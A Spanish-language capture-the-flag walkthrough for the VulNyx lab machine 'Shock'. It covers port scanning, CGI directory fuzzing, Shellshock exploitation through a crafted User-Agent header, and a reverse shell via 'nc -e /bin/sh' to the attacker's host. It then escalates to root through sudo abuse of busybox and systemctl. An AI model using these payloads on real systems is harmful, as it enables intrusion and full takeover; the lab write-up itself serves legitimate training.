🔵 NYX - Shock
#vulnyx #nyx #linux #shellshock #cve-2014-6271 #busybox (sudo) #systemctl (sudo)
Agosto 9, 2023 by Miguel R. (d4t4s3c)
Information
Shock es una máquina Linux de la plataforma VulNyx, tiene un nivel de dificultad bajo y fue creada por el usuario m0w.
- Acceso inicial: Se detecta y explota la vulnerabilidad Shellshock (CVE-2014-6271).
- Escalada de privilegios: El usuario dispone de permisos sudo sobre un binario y permitirá escapar una shell como root.
Enumeration
Nmap
TCP
❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.81
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-19 15:25 CET
Nmap scan report for 192.168.1.81
Host is up (0.0013s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp filtered ftp
22/tcp open ssh
80/tcp open http
❯ nmap -sVC -p22,80 192.168.1.81
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-19 15:26 CET
Nmap scan report for 192.168.1.81
Host is up (0.00032s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 37:36:60:3e:26:ae:23:3f:e1:8b:5d:18:e7:a7:c7:ce (RSA)
| 256 34:9a:57:60:7d:66:70:d5:b5:ff:47:96:e0:36:23:75 (ECDSA)
|_ 256 ae:7d:ee:fe:1d:bc:99:4d:54:45:3d:61:16:f8:6c:87 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
Shell (www-data)
80/TCP (HTTP)
Directory Brute Force
Encuentro la ruta /cgi-bin
❯ gobuster dir -w /opt/common.txt -u http://192.168.1.81/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.81/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/cgi-bin/ (Status: 403) [Size: 277]
/index.html (Status: 200) [Size: 20]
Progress: 4727 / 4727 (100.00%)
===============================================================
Finished
===============================================================
La ruta /cgi-bin es un directorio reservado por el servidor web que almacena los scripts CGI no soportados por el estándar HTML, sabiendo esto realizo fuzzing de archivos con extensiones que puedan usar dichos scripts.
❯ gobuster dir -w /opt/common.txt -u http://192.168.1.81/cgi-bin/ -x sh,cgi,py,pl
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.81/cgi-bin/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: sh,cgi,py,pl
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/shell.sh (Status: 500) [Size: 610]
Progress: 23635 / 23635 (100.00%)
===============================================================
Finished
===============================================================
En la ruta /cgi-bin encuentro el archivo shell.sh
Shellshock (CVE-2014-6271)
Confirmo que es vulnerable a Shellshock ejecutando comandos como usuario www-data
❯ curl -H "User-Agent: () { :; }; echo; /bin/bash -c 'id'" "http://192.168.1.81/cgi-bin/shell.sh"
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Reverse Shell
❯ curl -H "User-Agent: () { :; }; echo; /bin/bash -c 'nc -e /bin/sh 192.168.1.10 443'" "http://192.168.1.81/cgi-bin/shell.sh"
Obtengo la shell como usuario www-data
❯ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.10] from (UNKNOWN) [192.168.1.81] 57676
id ; hostname
uid=33(www-data) gid=33(www-data) groups=33(www-data)
shock
Shell (will)
El usuario www-data puede ejecutar como will el binario busybox con sudo
bash-4.3$ sudo -l
Matching Defaults entries for www-data on shock:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on shock:
(will) NOPASSWD: /usr/bin/busybox
En GTFOBins nos dan el one liner para escapar una shell
bash-4.3$ sudo -u will /usr/bin/busybox sh
BusyBox v1.30.1 (Debian 1:1.30.1-4) built-in shell (ash)
Enter 'help' for a list of built-in commands.
/usr/lib/cgi-bin $ id ; hostname
uid=1001(will) gid=1001(will) groups=1001(will)
shock
/usr/lib/cgi-bin $ bash -i
will@shock:/usr/lib/cgi-bin$
Privilege Escalation
El usuario will puede ejecutar como root el binario systemctl con sudo
will@shock:~$ sudo -l
Matching Defaults entries for will on shock:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User will may run the following commands on shock:
(root) NOPASSWD: /usr/bin/systemctl
En GTFOBins nos dan el one liner para escapar una shell
will@shock:~$ sudo -u root /usr/bin/systemctl
Al ejecutar systemctl se abre en paginated mode y con !/bin/sh me convierto en usuario root
!/bin/bash
root@shock:/home/will# id ; hostname
uid=0(root) gid=0(root) groups=0(root)
shock
Flags
Ya como usuario root puedo leer las flags user.txt y root.txt
root@shock:/home/will# find / -name user.txt -o -name root.txt |xargs cat
f47fa6**************************
0afcf8**************************
Hasta aquí la resolución de la máquina Shock.
Happy Hacking!
© d4t4s3c 2023-2025